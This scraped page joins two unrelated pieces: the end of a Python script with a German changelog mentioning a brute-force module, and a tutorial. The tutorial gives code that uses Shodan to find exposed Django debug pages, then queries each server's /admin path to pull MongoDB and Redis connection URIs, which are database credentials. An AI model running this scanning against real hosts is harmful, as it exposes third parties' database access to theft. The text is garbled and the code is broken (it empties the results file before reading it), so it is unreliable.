28.02.2020 - Bug Fixes, Brute Module eing...-------------------- " print " 01.10.2020 - Bug Fixes und kleib tests durchgefürt " print "--------------------------------------------------------------------" if len(sys.argv) == 3: main = main(sys.argv[1]) main.run(sys.argv[2]) elif len(sys.argv) == 4: main = main(sys.argv[1], timeout = sys.argv[3]) main.run(sys.argv[2]) else: help()
  2. Let’s install the shodan module by executing the following command. pip install shodan import shodan SHODAN_API_KEY = "YOUR_SHODAN_API" api = shodan.Shodan(SHODAN_API_KEY) words = open("bug-bounty-wordlist.txt","r") django_debug_list = open("django-debug-list.txt","w") for word in words.readlines(): query = "html:'URLconf defined' ssl:"+word.strip('\n') try: results = api.search(query) print('Results found: {}'.format(results['total'])) for result in results['matches']: print(word) print('IP: {}'.format(result['ip_str'])) port = result['port'] if port in [80,443]: if port==443: ip = "https://"+result['ip_str'] else: ip = "http://"+result['ip_str'] else: ip = "http://"+result['ip_str']+":"+str(port) django_debug_list.write(ip+'\n') print('') except Exception as e: print(e) This shodan python module is an official wrapper around the shodan API. We can use all the filters specified in the shodan docs via this module. You need to get an api key in shodan.io by creating an account. Every year in November month as a black friday offer shodan provides a member account for $5. You can afford it. In the above program, we have opened a domain wordlist file and iterate it over the loop then construct the shodan query which can be passed to shodan search api function which returns a list of dictionaries. You can check the IP address manually or you can automate that process also. Okay Let’s automate import requests,re django_debug_list = open("django-debug-list.txt","w") regex = r"(?:mongodb|redis):\/\/" for ip in django_debug_list.readlines(): try: response = requests.post(url=ip.rstrip("\n")+"/admin",data= {},verify=False) if re.search(regex,response.content): print("Mongodb/Redis URI Found") except Exception as e: print(e) Here you can see regex to match mongodb:// or redis:// or both. You can see a function rstrip that is used to remove something right in the strings, here I removed the new line (\n) character. I passed a parameter verify=False that means I tell the program to don’t verify the ssl certificate of the server. You can use your own regex to match something else other than mongodb/redis URI.